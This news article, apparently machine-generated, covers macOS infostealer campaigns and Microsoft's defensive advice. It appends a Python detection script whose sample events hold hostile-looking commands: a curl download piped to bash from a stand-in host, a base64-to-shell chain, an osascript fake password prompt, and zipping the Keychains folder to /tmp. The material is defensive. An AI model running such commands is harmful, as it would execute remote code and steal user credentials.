

Ethical Hacking News

New Threat Landscape: Info-Stealing Attacks on macOS Expand from Windows



A new wave of info-stealing attacks has been detected expanding from Microsoft Windows to macOS, using social engineering tactics and exploiting vulnerabilities in trusted platforms. The campaigns pose a significant threat to Mac users and organizations worldwide and underline the need for a layered defense strategy to stop them.

  • Cybersecurity experts warn of a new wave of info-stealing attacks expanding from Microsoft Windows to macOS.
  • The attackers use social engineering tactics, exploit vulnerabilities in trusted platforms, and pose a significant threat to Mac users and organizations worldwide.
  • The campaigns leverage cross-platform languages like Python, abuse trusted apps like WhatsApp, and use native tools to steal credentials, crypto, and session data.
  • Fileless execution, AppleScript automation, and phishing emails carrying Python-based stealers are used to harvest logins, financial data, and browser sessions from Mac users.
  • Malware is also spreading through WhatsApp and PDF tools, turning normal apps into delivery channels for credential and crypto theft.
  • To combat these threats, Microsoft advises a layered defense strategy, including monitoring macOS for risky Terminal activity and inspecting outbound traffic.



Cybersecurity experts have sounded the alarm as a new wave of info-stealing attacks has been detected expanding from Microsoft Windows to macOS. The malicious campaigns, which utilize social engineering tactics and exploit vulnerabilities in trusted platforms, pose a significant threat to Mac users and organizations worldwide.

According to recent reports, the attackers are leveraging cross-platform languages like Python to deploy macOS-specific infostealers, abusing trusted apps like WhatsApp, and using native tools to steal credentials, crypto, and session data while evading defenses. The campaigns have been observed using fileless execution, AppleScript automation, and other tactics to harvest sensitive information from Mac users.

The most recent example of this threat was reported by Microsoft, which revealed that it had observed a surge in macOS infostealer attacks since late 2025. These attacks use social engineering techniques, including ClickFix-style prompts and malicious DMG installers, to deploy macOS-specific infostealers such as DigitStealer, MacSync, and Atomic macOS Stealer (AMOS).

These campaigns leverage fileless execution, native macOS utilities, and AppleScript automation to harvest credentials, session data, and secrets from browsers, keychains, and developer environments. Attackers are also using phishing emails to spread Python-based stealers, which can steal logins, financial data, and browser sessions.

Moreover, attackers are abusing trusted platforms like WhatsApp and PDF tools to spread malware, turning normal apps into delivery channels for credential and crypto theft. In November 2025, Microsoft observed a WhatsApp abuse campaign that spread Eternidade Stealer through a multi-stage, worm-like infection chain. The attack starts with an obfuscated VBScript that launches PowerShell to fetch payloads. A Python component hijacks WhatsApp accounts to message all contacts with malicious files, while a malicious MSI installs Eternidade Stealer to steal banking, payment, and cryptocurrency credentials.

In September 2025, Microsoft uncovered a fake "Crystal PDF" editor spread via Google Ads and SEO poisoning. Once installed, it persists via scheduled tasks and steals browser cookies, sessions, and credentials from Chrome and Firefox.

To combat these threats, Microsoft has advised Mac users to adopt a layered defense strategy to stop macOS, Python-based, and platform-abuse infostealers. The company recommends training users to spot fake ads, bogus installers, and ClickFix copy-paste tricks, and to avoid unsigned DMGs or "terminal fixes." It also advises monitoring macOS for risky Terminal activity such as curl downloads, Base64 decoding, AppleScript, and fileless execution chains.

Users should also watch for unusual access to Keychain, browser credentials, cloud keys, and crypto wallets. Inspecting outbound traffic for POST requests to new or suspicious domains, and for short-lived ZIP files created in temp folders shortly before data exfiltration, is crucial. Blocking known command-and-control servers using threat intelligence and strengthening defenses against Python and LOLBIN abuse, including certutil misuse, AutoIt activity, and process hollowing, can also help prevent attacks.

Enabling cloud-delivered protection, EDR in block mode, network and web protection, SmartScreen, automated investigation, and tamper protection is essential. Applying attack surface reduction rules to block obfuscated scripts, untrusted executables, and scripts launching downloaded payloads will further enhance security.
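As an added example (not part of the original article and not Microsoft's tooling), the following Python script applies the Terminal-activity checks described above to constructed process-execution events: curl output piped to a shell, Base64 decoding feeding an interpreter, AppleScript password prompts, archives staged in temp folders, and Keychain or browser-store access. The event format, the rule patterns and the sample events are all assumptions.

```python
import re

# Detection rules for the Terminal-activity indicators the article lists:
# curl, Base64 decoding, AppleScript prompts, fileless execution chains and
# archives staged in temp folders. The patterns are my own assumptions.
RULES = {
    "download piped to shell":
        re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba|z)?sh\b"),
    # macOS base64 decodes with -D, GNU coreutils with -d/--decode
    "base64 decode feeding interpreter":
        re.compile(r"\bbase64\s+(?:-[dD]|--decode)\b.*\|\s*(?:(?:ba|z)?sh|python3?)\b"),
    "applescript credential prompt":
        re.compile(r"\bosascript\b.*\bdisplay dialog\b.*\bhidden answer\b"),
    "archive staged in temp folder":
        re.compile(r"\b(?:zip|ditto|tar)\b.*\s(?:/tmp|/private/tmp|/var/folders)/"),
    "keychain or browser store touched":
        re.compile(r"Library/(?:Keychains|Application Support/Google/Chrome)\b"),
}

# Constructed process-execution events, not from any real host:
# "<timestamp> <parent process> :: <command line>"
SAMPLE_EVENTS = [
    "2026-02-04T07:51:00Z Terminal :: curl -fsSL http://update.example.invalid/fix.sh | bash",
    "2026-02-04T07:51:02Z bash :: echo 'ZWNobyBoaQ==' | base64 -D | sh",
    "2026-02-04T07:51:05Z sh :: osascript -e 'display dialog \"macOS needs your password\" default answer \"\" with hidden answer'",
    "2026-02-04T07:51:09Z sh :: zip -r /tmp/.cache.zip /Users/alice/Library/Keychains",
    "2026-02-04T08:00:00Z Terminal :: git pull origin main",
    "2026-02-04T08:00:01Z Terminal :: curl -sS https://api.example.invalid/healthz",
]

def parse_event(line):
    """Split one event line into timestamp, parent process and command line."""
    head, _, cmdline = line.partition(" :: ")
    ts, _, parent = head.partition(" ")
    return {"ts": ts, "parent": parent, "cmdline": cmdline}

def match_rules(cmdline):
    """Return the names of every rule whose pattern hits the command line."""
    return [name for name, pat in RULES.items() if pat.search(cmdline)]

def triage(events):
    """Keep only events that hit at least one rule, with the rule names attached."""
    findings = []
    for line in events:
        ev = parse_event(line)
        hits = match_rules(ev["cmdline"])
        if hits:
            findings.append({**ev, "rules": hits})
    return findings
```

Benign curl calls without a pipe into a shell, such as the health-check event, are deliberately not flagged; the signal is the chain, not the tool.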



Related Information:
  • https://www.ethicalhackingnews.com/articles/New-Threat-Landscape-Info-Stealing-Attacks-on-macOS-Expand-from-Windows-ehn.shtml
  • https://securityaffairs.com/187608/security/microsoft-info-stealing-malware-expands-from-windows-to-macos.html


Published: Wed Feb 4 07:51:29 2026 by llama3.2 3B Q4_K_M